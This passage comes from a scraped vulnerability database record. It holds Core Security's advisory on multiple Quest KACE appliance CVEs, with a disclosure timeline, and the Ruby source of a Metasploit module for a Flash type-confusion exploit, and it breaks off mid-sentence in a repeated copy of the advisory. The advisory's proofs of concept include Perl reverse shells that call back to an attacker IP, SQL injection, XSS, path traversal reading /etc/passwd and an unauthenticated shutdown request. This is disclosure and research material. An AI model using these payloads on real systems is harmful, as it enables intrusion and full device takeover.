\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code \nexecution but would require the attacker to have a valid authentication \ntoken. \n \nIn addition, issues found in the Sudo Server module presented in 7.4 and \n7.5 would allow the attacker to elevate his privileges from the web server \nuser to root, effectively obtaining full control of the device. \n \nAdditional web application vulnerabilities were found in the console, such \nas insufficient authorization for critical functions, which would allow an \nanonymous attacker to reconfigure the appliance (7.6), SQL injection \nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path \ntraversal vulnerabilities, which would allow an attacker to read, write and \ndelete arbitrary files (7.9, 7.10, 7.11). \n \n7.1. *Unauthenticated command injection* \n \n[CVE-2018-11138] \nThe '/common/download_agent_installer.php' script is accessible to anonymous \nusers in order to download an agent for a specific platform. This behavior \ncan be abused to execute arbitrary commands on the system. \n \nThe script receives the following parameters via the GET method: \n \n. platform: Indicates the platform in which the agent is going to be \ninstalled \n. serv: SHA256 hash of a fixed value that depends of each appliance \n. orgid: Organization ID \n. version: Version number of the agent \n \nThe last two conditions are simple to meet. The Agent versions are publicly \navailable within the Quest KACE site, but even if they were not, we found \nthat the Organization ID parameter is vulnerable to a time based SQL \ninjection \n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the \ntable 'CLIENT_DISTRIBUTION' and fetching the contents of the 'VERSION' \ncolumn. The Organization ID is 1 by default, but could be obtained in the \nsame way as the Agent version by querying the table 'ORGANIZATION' and \nthe column 'ID'. \n \nAs stated above, the application uses the Organization ID and Agent \nversion parameters to execute commands. This means we need to find a way \nto append system commands within the Organization ID, without breaking the \nSQL query. If we use the comment symbol (#), we can append anything we want \nwithout affecting the result of the query. \n \nPreparing payload: \n \n/----- \n- platform = windows \n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c \n- orgid = 1#;perl -e 'use \nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/bash \n-i\");};'; \n- version = 8.0.152 (last agent version available for windows) \n-----/ \n \nThe following proof of concept executes a reverse shell: \n \n/----- \nGET \n/common/download_agent_installer.php?platform=windows&serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c&orgid=1%23%3bperl+-e+'use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">%26S\")%3bopen(STDOUT,\">%26S\")%3bopen(STDERR,\">%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b'%3b&version=8.0.152 \nHTTP/1.1 \nHost: Server \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nConnection: close \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 0 \n-----/ \n \n/----- \n$ nc -lvp 8080 \nListening on [0.0.0.0] (family 0, port 8080) \nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, \nsport 20050) \nsh: can't access tty; job control turned off \n$ id \nuid=80(www) gid=80(www) groups=80(www) \n-----/ \n \n7.2. *Authenticated command injection* \n \n[CVE-2018-11139] \nThe '/common/ajax_email_connection_test.php' script used to test the \nconfigured \nSMTP server is accessible by any authenticated user and can be abused to \nexecute arbitrary commands on the system. This script is vulnerable to \ncommand injection via the unsanitized user input 'TEST_SERVER' sent to the \nscript via POST method. \n \nThe following proof of concept executes a reverse shell: \n \n/----- \nPOST /common/ajax_email_connection_test.php HTTP/1.1 \nHost: [ServerIP] \nAccept: application/json, text/javascript, */*; q=0.01 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nContent-Length: 416 \nCookie: [Cookie] \nConnection: close \n \nTEST_SERVER=test;perl+-e+'use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">%26S\")%3bopen(STDOUT,\">%26S\")%3bopen(STDERR,\">%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b';&TEST_PORT=587&TEST_USERNAME=eaea@eaea.com&TEST_PASSWORD=1234&TEST_OLD_PASSWORD=&QUEUE_ID=1&TEST_TO_EMAIL=eaea@eaea.com&ACTION=TEST_CONNECTION_SMTP \n-----/ \n \n/----- \n$ nc -lvp 8080 \nListening on [0.0.0.0] (family 0, port 8080) \nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, \nsport 20050) \nsh: can't access tty; job control turned off \n$ id \nuid=80(www) gid=80(www) groups=80(www) \n-----/ \n \n7.3. *PHP Object Injection leading to arbitrary command execution* \n \n[CVE-2018-11135] \nAn authenticated user could abuse a deserialization call on the script \n'/adminui/error_details.php' to inject arbitrary PHP objects. \n \nTo exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array \nand meet some specific conditions in order to successfully exploit the \nissue. \n \n7.4. *Privilege escalation via password change in Sudo Server* \n \n[CVE-2018-11134] \nIn order to perform actions that requires higher privileges, the application \nrelies on a message queue managed that runs with root privileges and only \nallows a set of commands. \n \nOne of the available commands allows to change any user's password \n(including root). \n \nAssuming we are able to run commands in the server, we could abuse this \nfeature by changing the password of the 'kace_support' account, which \ncomes disabled by default but has full sudo privileges. \n \n7.5. *Privilege escalation via command injection in Sudo Server* \n \n[CVE-2018-11132] \nAs mentioned in the issue [7.4], in order to perform actions that require \nhigher privileges, the application relies on a message queue that runs \ndaemonized with root privileges and only allows a set of commands to be \nexecuted. \n \nA command injection vulnerability exists within this message queue which \nallows us to append arbitrary commands that will be run as root. \n \n7.6. *Insufficient Authorization for critical function* \n \n[CVE-2018-11142] \n'systemui/settings_network.php' and 'systemui/settings_patching.php' \nscripts are accessible only from localhost. This restriction can be bypassed \nby modifying the 'Host' and 'X_Forwarded_For' HTTP headers. \n \nThe following proof of concept abuses this vulnerability to shutdown the \nserver as an anonymous user: \n \n/----- \nPOST /systemui/settings_network.php HTTP/1.1 \nHost: localhost \nX-Forwarded-For: ::1 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://[ServerIp]/systemui/settings_network.php \nContent-Type: multipart/form-data; \nboundary=---------------------------5642543667001619951434940129 \nContent-Length: 3418 \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \n-----------------------------5642543667001619951434940129 \nContent-Disposition: form-data; name=\"CSRF_TOKEN\" \n-----------------------------5642543667001619951434940129 \nContent-Disposition: form-data; name=\"$shutdown\" \nDoIt! \nContent-Disposition: form-data; name=\"save\" \nSave \n-----------------------------5642543667001619951434940129-- \n-----/ \n \n7.7. *Unauthenticated SQL Injection in download_agent_installer.php* \n \n[CVE-2018-11136] \nThe 'orgID' parameter received by the '/common/download_agent_installer.php' \nscript is not sanitized, leading to SQL injection. In particular, a blind \ntime based type. \n \nThe following proof of concept induces a time delay: \n \n/----- \nhttp://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 \nAND SLEEP(10)%23;&version=8.0.152 \n-----/ \n \n7.8. *SQL Injection in run_report.php* \n \n[CVE-2018-11140] \nThe 'reportID' parameter received by the '/common/run_report.php' script \nis not sanitized, leading to SQL injection. In particular, an error based \ntype. \n \nThe following proof of concept retrieves the current database name: \n \n/----- \nPOST /common/run_report.php HTTP/1.1 \nContent-Length: 161 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nHost: [ServerIP] \nAccept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8 \nConnection: close \nReferer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nCookie: [Cookie] \n \ndate=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf \n-----/ \n \n/----- \nHTTP/1.1 200 OK \nDate: Thu, 08 Feb 2018 21:50:21 GMT \nServer: Apache \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, \npre-check=0 \nPragma: no-cache \nVary: Accept-Encoding \nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, \nx-kace-auth-signature, accept, origin, content-type \nAccess-Control-Allow-Origin: * \nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS \nX-KACE-Appliance: K1000 \nX-KACE-Host: [ServerIP] \nX-KACE-Version: 8.0.318 \nX-KBOX-WebServer: [ServerIP] \nX-KBOX-Version: 8.0.318 \nX-KACE-WebServer: [ServerIP] \nX-UA-Compatible: IE=9,EDGE \nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform \nContent-Length: 3548 \nConnection: close \nContent-Type: text/html; charset=utf-8 \n \n[...SNIPPED...] \n<script type=\"text/javascript\" \nsrc=\"/common/js/vendor/html5.js?BUILD=318\" /></script> \n<![endif]--><title>Report Queued: qppjqORG1qjpqq</title><meta \nhttp-equiv='refresh' \n[...SNIPPED...] \n-----/ \n \n7.9. *Unauthenticated Cross Site Scriting in run_cross_report.php* \n \n[CVE-2018-11133] \nThe 'fmt' parameter of the '/common/run_cross_report.php' script is \nvulnerable to cross-site scripting. \n \nThe following proof of concept demonstrates the vulnerability: \n \n/----- \nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 \n-----/ \n \n7.10. *Path traversal in download_attachment.php leading to arbitrary \nfile read* \n \n[CVE-2018-11137] \nThe 'checksum' parameter of the '/common/download_attachment.php' script can \nbe abused to read arbitrary files with 'www' privileges. The following proof \nof concept reads the '/etc/passwd' file. No administrator privileges are \nneeded to execute this script. \n \nIt is worth noting that there are several interesting files that can be \nread with 'www' privileges, such as all the files located in \n'/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', \nwhich contain plaintext passwords. \n \n/----- \nhttp://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 \n-----/ \n \nThe following proof of concept demonstrates the vulnerability: \n \n/----- \nGET \n/common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= \nHTTP/1.1 \nHost: [ServerIP] \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: [Cookie] \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \nHTTP/1.1 200 OK \nDate: Thu, 18 Jan 2018 17:18:19 GMT \nServer: Apache \nCache-Control: must-revalidate, post-check=0, pre-check=0 \nExpires: -1 \nPragma: public \nContent-Disposition: attachment; filename=\"\" \nContent-Transfer-Encoding: Binary \nContent-Description: K1000 attachment \nContent-Length: 2400 \nAccess-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, \nx-kace-auth-signature, accept, origin, content-type \nAccess-Control-Allow-Origin: * \nAccess-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS \nX-KACE-Appliance: K1000 \nX-KACE-Host: k10000. \nX-KACE-Version: 8.0.318 \nX-KBOX-WebServer: k10000. \nX-KBOX-Version: 8.0.318 \nX-KACE-WebServer: k10000. \nX-UA-Compatible: IE=9,EDGE \nCache-Control: private, no-cache, no-store, proxy-revalidate, no-transform \nConnection: close \nContent-Type: application/octet-stream \n \n# $FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $ \n# \nroot:*:0:0:Charlie &:/root:/bin/csh \ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin \noperator:*:2:5:System &:/:/usr/sbin/nologin \nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin \ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] \n-----/ \n \n7.11. *Path traversal in advisory.php leading to arbitrary file \ncreation/deletion* \n \n[CVE-2018-11141] \nThe 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the \n'/adminui/advisory.php' script can be abused to write and delete files \nrespectively. The following proof of concept creates a file located at \n'/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 \nencoded). \nFiles can be at any location where the 'www' user has write permissions. \n \nFile deletion could be abused to delete \n'/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's \nexistence defines if the appliance setup wizard is shown or not. \n \nThe following proof of concept demonstrates the vulnerability: \n \n/----- \nPOST /adminui/advisory.php?ID=10 HTTP/1.1 \nHost: [ServerIP] \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://[ServerIP]/adminui/advisory.php?ID=10 \nContent-Type: multipart/form-data; \nboundary=---------------------------2671551246366368501556269100 \nContent-Length: 1705 \nCookie: [Cookie] \nConnection: close \nUpgrade-Insecure-Requests: 1 \n \n-----------------------------2671551246366368501556269100 \nContent-Disposition: form-data; name=\"CSRF_TOKEN\" \n \n99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e \n-----------------------------2671551246366368501556269100 \nContent-Disposition: form-data; name=\"IMAGES_JSON\" \n \n{\"/../../../resources/TestWrite\":\"aaaaaa,VGVzdENvbnRlbnQ=\"} \n-----------------------------2671551246366368501556269100 \nContent-Disposition: form-data; name=\"FARRAY[ID]\" \n[...SNIPPED...] \n-----/ \n \nTaking advantage of 7.2 and 7.4 we are able to verify the file creation: \n \n/----- \n[root@k10000 /kbox/kboxwww/resources]# ls -lha \ntotal 32 \ndrwxr-xr-x 2 www wheel 512B Feb 9 20:40 . \ndrwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. \n-rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite \n-----/ \n \n8. *Report Timeline* \n2018-02-26: Core Security (Core) sent an initial notification to Quest \nSoftware Inc. (Quest) via web form. \n2018-03-05: Quest Support confirmed the receipt and requested additional \ninformation. \n2018-03-12: Core Security sent a draft advisory including a technical \ndescription. \n2018-03-16: Quest Support asked for the CVE-IDs. \n2018-03-16: Core Security answered saying that the CVE-IDs are required \nonce the vendor verifies the vulnerabilities. Additionally, Core Security \nrequested a confirmation about the reported vulnerabilities and a tentative \ntimescale to fix them. Finally, Core Security requested that Quest use \nCore's advisories-publication email address as the official communication \nhannel also copying the researchers behind this discovery. \n2018-03-16: Quest Support thanked Core's reply and stated it will be in \ntouch during the process. \n2018-03-20: Quest Support informed that they had not yet received any \nupdates from the engineering team and had requested one. \n2018-03-21: Quest Support requested information about the KACE version \nused for reporting the issues and also Core's company name and information. \n2018-03-21: Core replied with the affected version (that was included in \nthe original draft advisory) and a link to the Core company website and \nthe list of previous security advisories. \n2018-03-21: Quest Support acknowledged the information provided. \n2018-03-26: Quest's KACE product manager (PM) thanked Core for making it \naware of the security issues found and the level of thoroughness and details \nprovided. Quest specified it had fixes already in place for some of the \nissues. Quest's KACE PM asked for a conference call in order to understand \nmore about Core's offerings for future engagements. Finally, Quest's KACE \nPM notified the work done by Core is in breach of its license agreement, \nand requested Core not to distribute the findings to the public, otherwise \nuest would take legal action. \n2018-04-13: Quest's KACE PM sent a follow up email and informed that it \nmade a hotfix to patch the reported vulnerabilities. Quest also requested \na call meeting to understand future opportunities based on the Core's \ncompany capabilities. Finally, Quest asked for information about the \nresearcher that found the vulnerabilities and a link of Core's choosing \nin order to be included in Quest's Acknowledgment page \n(https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). \n2018-04-16: Core answered email from 2018-03-26 stating the company is \nfollowing standard practices with regards to coordinated vulnerability \ndisclosure, and also sent detailed technical information about our findings \nat Quest's request. Core also mentioned Quest seems to be well versed in \nthe disclosure process and expects vendors to coordinate with it prior to \npublication via Quest's vulnerability reporting process, and that Quest's \nlegal threat appears to be in direct contradiction to the disclosure \nprocess that they encourage on their website. Finally, Core asked about \nQuest's intention to work collaboratively to address these vulnerabilities \nand to follow industry standard disclosure processes that involves \npublication of the vulnerabilities. \n2018-04-17: Quest's KACE PM replied saying it is willing to collaborate \nand is looking forward to having a conversation over the phone in order to \ncontinue the next steps in its vulnerability process (forwarded email from \n2018-04-13). \n2018-04-17: Core thanked the answer and stated the willingness of keeping \nwritten communications between parties in order to better document the \nprocess and communicated the next steps of the process including: 1. Testing \nthe fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be \nincluded in the advisory and finally 4. Send final advisory version to \nvendor and coordinate publication date together. With regards to Quest's \nrequests, Core provided the researchers names and URL of the advisory when \nit will be published. Finally, Core stated that the request for other Core \ncompany services could be forwarded to the Core services team if needed \n(and asked the right contact at Quest) but our intention is to keep that \nservices request separate from the coordinated disclosure process. \n2018-04-18: Quest Support informed that they had publicly made available \npatches for its customers and unilaterally closed the case. \n2018-05-31: Advisory CORE-2018-0004 published. \n \n9. *References* \n \n[1] https://www.quest.com/products/kace-systems-management-appliance/ \n \n10. *About CoreLabs* \n \nCoreLabs, the research center of Core Security, is charged with anticipating \nthe future needs and requirements for information security technologies. \nWe conduct our research in several important areas of computer security \nincluding system vulnerabilities, cyber-attack planning and simulation, \nsource code auditing, and cryptography. Our results include problem \nformalization, identification of vulnerabilities, novel solutions and \nprototypes for new technologies. CoreLabs regularly publishes security \nadvisories, technical papers, project information and shared software \ntools for public use at: \nhttp://corelabs.coresecurity.com. \n \n11. *About Core Security* \n \nCore Security provides companies with the security insight they need to \nknow who, how, and what is vulnerable in their organization. The company's \nthreat-aware, identity amp; access, network security, and vulnerability \nmanagement solutions provide actionable insight and context needed to \nmanage security risks across the enterprise. This shared insight gives \ncustomers a comprehensive view of their security posture to make better \nsecurity remediation decisions. Better insight allows organizations to \nprioritize their efforts to protect critical assets, take action sooner \nto mitigate access risk, and react faster if a breach does occur. \n \nCore Security is headquartered in the USA with offices and operations in \nSouth America, Europe, Middle East and Asia. To learn more, contact Core \nSecurity at (678) 304-4500 or info@coresecurity.com \n \n12. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2018 Core Security and (c) \n2018 CoreLabs, and are licensed under a Creative Commons Attribution \nNon-Commercial Share-Alike 3.0 (United States) License: \nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n13. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nadvisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148005/CORE-2018-0004.txt"}], "metasploit": [{"lastseen": "2019-04-23T06:24:43", "bulletinFamily": "exploit", "description": "This module exploits a type confusion on Adobe Flash Player, which was originally found being successfully exploited in the wild. This module has been tested successfully on: macOS Sierra 10.12.3, Safari and Adobe Flash Player 21.0.0.182, Firefox and Adobe Flash Player 21.0.0.182.", "modified": "2019-02-09T10:46:35", "published": "2018-10-10T09:27:51", "id": "MSF:EXPLOIT/OSX/BROWSER/ADOBE_FLASH_DELETE_RANGE_TL_OP", "href": "", "type": "metasploit", "title": "Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',\n 'Description' => %q(\n This module exploits a type confusion on Adobe Flash Player, which was\n originally found being successfully exploited in the wild. This module\n has been tested successfully on:\n macOS Sierra 10.12.3,\n Safari and Adobe Flash Player 21.0.0.182,\n Firefox and Adobe Flash Player 21.0.0.182.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Genwei Jiang', # FireEye original blog details on the vulnerability\n 'bcook-r7' # Imported Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2016-4117'],\n ['BID', '90505'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],\n ['URL', 'http://www.securitytracker.com/id/1035826'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['osx'],\n 'BrowserRequirements' =>\n {\n source: /script|headers/i,\n os_name: lambda do |os|\n os =~ OperatingSystems::Match::MAC_OSX\n end,\n ua_name: lambda do |ua|\n case target.name\n when 'Mac OS X'\n return true if ua == Msf::HttpClients::SAFARI\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n flash: lambda do |ver|\n case target.name\n when 'Mac OS X'\n return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [\n 'Mac OS X', {\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Apr 27 2016',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri.end_with? 'swf'\n print_status('Sending SWF...')\n send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), 'Pragma' => 'no-cache')\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(3..7)}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n\n if target.name.include? 'osx'\n platform_id = 'osx'\n end\n html_template = %(<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n )\n\n return html_template, binding\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')\n File.binread(path)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb"}], "coresecurity": [{"lastseen": "2018-05-31T20:39:20", "bulletinFamily": "info", "description": "## 1\\. Advisory Information\n\n**Title: **Quest KACE System Management Appliance Multiple Vulnerabilities \n**Advisory ID: **CORE-2018-0004 \n**Advisory URL: **<http://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities> \n**Date published: **2018-05-31 \n**Date of last update: **2018-05-22 \n**Vendors contacted: **Quest Software Inc. \n**Release mode: **Forced release\n\n## 2\\. Vulnerability Information\n\n**Class: **Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Improper Neutralization of Special Elements used in an OS Command [[CWE-78](<http://cwe.mitre.org/data/definitions/78.html>)], Deserialization of Untrusted Data [[CWE-502](<http://cwe.mitre.org/data/definitions/502.html>)], Improper Privilege Management [[CWE-269](<http://cwe.mitre.org/data/definitions/269.html>)], Improper Privilege Management [[CWE-269](<http://cwe.mitre.org/data/definitions/269.html>)], Improper Authorization [[CWE-285](<http://cwe.mitre.org/data/definitions/285.html>)], Improper Neutralization of Special Elements used in an SQL Command [[CWE-89](<http://cwe.mitre.org/data/definitions/89.html>)], Improper Neutralization of Special Elements used in an SQL Command [[CWE-89](<http://cwe.mitre.org/data/definitions/89.html>)], Improper Neutralization of Input During Web Page Generation [[CWE-79](<http://cwe.mitre.org/data/definitions/79.html>)], External Control of File Name or Path [[CWE-73](<http://cwe.mitre.org/data/definitions/73.html>)], External Control of File Name or Path [[CWE-73](<http://cwe.mitre.org/data/definitions/73.html>)] \n**Impact: **Code execution \n**Remotely Exploitable: **Yes \n**Locally Exploitable: **Yes \n**CVE Name: **[CVE-2018-11138](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11138>), [CVE-2018-11139](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11139>), [CVE-2018-11135](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11135>), [CVE-2018-11134](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11134>), [CVE-2018-11132](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11132>), [CVE-2018-11142](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11142>), [CVE-2018-11136](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11136>), [CVE-2018-11140](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11140>), [CVE-2018-11133](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11133>), [CVE-2018-11137](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11137>), [CVE-2018-11141](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11141>)\n\n## 3\\. Vulnerability Description\n\nFrom Quest KACE's website:\n\n\"The KACE Systems Management Appliance [1] provides your growing organization with comprehensive management of network-connected devices, including servers, PCs, Macs, Chromebooks, tablets, printers, storage, networking gear and the Internet of Things (IoT). KACE can fulfill all of your organization's systems management needs, from initial deployment to ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management Virtual Appliance that would allow a remote attacker to gain command execution as root. We present three vectors to achieve this, including one that can be exploited as an unauthenticated user.\n\nAdditional web application vulnerabilities were found in the web console that is bundled with the product. These vulnerabilities are detailed in section 7.\n\nNote: This advisory has limited details on the vulnerabilities because during the attempted coordinated disclosure process, Quest advised us not to distribute our original findings to the public or else they would take legal action. Quest's definition of \"responsible disclosure\" can be found at <https://support.quest.com/essentials/reporting-security-vulnerability>.\n\nCoreLabs has been publishing security advisories since 1997 and believes in coordinated disclosure and good faith collaboration with software vendors before disclosure to help ensure that a fix or workaround solution is ready and available when the vulnerability details are publicized. We believe that providing technical details about each finding is necessary to provide users and organizations with enough information to understand the implications of the vulnerabilities against their environment and, most importantly, to prioritize the remediation activities aiming at mitigating risk.\n\nWe regret Quest's posture on disclosure during the whole process (detailed in the Report Timeline section) and the lack of a possibility of engaging into a coordinated publication date, something we achieve (and have achieved) with many vendors as part of our coordinated disclosure practices.\n\n## 4\\. Vulnerable Packages\n\n * Quest KACE System Management Appliance 8.0 (Build 8.0.318)\n\nOther products and versions might be affected too, but they were not tested.\n\n## 5\\. Vendor Information, Solutions and Workarounds\n\nQuest reports that it has released the security vulnerability patch SEC2018_20180410 to address the reported vulnerabilities. Patch can be download at <https://support.quest.com/download-install-detail/6086148>.\n\nFor more details, Quest published the following Security Note: [https://support.quest.com/kace-systems-management-appliance/kb/254193/se...](<https://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410->)\n\n## 6\\. Credits\n\nThese vulnerabilities were discovered and researched by Leandro Barragan and Guido Leo from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.\n\n## 7\\. Technical Description / Proof of Concept Code\n\nQuest KACE SMA ships with a web console that provides administrators and users with several features. Multiple vulnerabilities were found in the context of this console, both from an authenticated and unauthenticated perspective.\n\nSection 7.1 describes how an unauthenticated attacker could gain command execution on the system as the web server user.\n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code execution but would require the attacker to have a valid authentication token.\n\nIn addition, issues found in the Sudo Server module presented in 7.4 and 7.5 would allow the attacker to elevate his privileges from the web server user to root, effectively obtaining full control of the device.\n\nAdditional web application vulnerabilities were found in the console, such as insufficient authorization for critical functions, which would allow an anonymous attacker to reconfigure the appliance (7.6), SQL injection vulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path traversal vulnerabilities, which would allow an attacker to read, write and delete arbitrary files (7.9, 7.10, 7.11).\n\n### 7.1. Unauthenticated command injection\n\n[[CVE-2018-11138](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-11138>)] The '/common/download_agent_installer.php' script is accessible to anonymous users in order to download an agent for a specific platform. This behavior can be abused to execute arbitrary commands on the system.\n\nThe script receives the following parameters via the GET method:\n\n * 